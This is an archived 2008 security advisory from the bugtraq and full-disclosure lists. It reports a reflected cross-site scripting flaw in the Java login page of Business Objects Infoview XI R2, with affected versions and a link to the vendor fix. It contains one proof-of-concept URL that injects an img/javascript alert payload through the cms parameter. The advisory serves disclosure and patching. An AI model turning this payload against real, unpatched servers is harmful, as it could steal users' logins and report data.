[<prev] [next>] [day] [month] [year] [list]
Message-Id: <6CC8ABDE-E641-464B-A30B-4C4C6B124CCE@gioria.org>
Date: Sun, 13 Apr 2008 23:30:32 +0200
From: Sebastien gioria <seb@...ria.org>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk,
vulnwatch@...nwatch.org
Subject: DOINGSOFT-2008-03-10-001 - XSS issue in BOXiR2
Identification : DOINGSOFT-2008-03-10-001
CVE-ID : pending
Discovery date : 14/12/2007
Correcting Date : 03/04/2008
How to get the patch :
http://support.businessobjects.com/downloads/critical_hot_fixes/default.asp
choose "FixPack 3.5"
Publishing date : 14/04/2008
Product : Business Object Infoview XI R2 Java version
Affected Version : XI R2, XI R2 SP1, XI R2 SP2, XI R2 SP3
Immunes Versions : Business Object Infoview XI R2 .Net version
Vulnerability : Cross Site Scripting (XSS)
Description : BOxiR2 is vulnerable of XSS attacks on the login URL
via the CMS variable.
With malicious utilization an attacker could get login/password and
datas or reports.
Example :
http://www.monserveurBO.com/businessobjects/enterprise115/desktoplaunch/InfoView/logon/logon.object;jsessionid=7E1EFA4F83461F81157B67D7EA471A12?qryStr=&cmsVisible=true&authenticationVisible=true&referer=&refererFormData=&isFromLogonPage=true&cms=
>%22%27><img%20src%3d%22javascript:alert(%27XSS%20Test%20Successful
%27)%22>"
Powered by blists - more mailing lists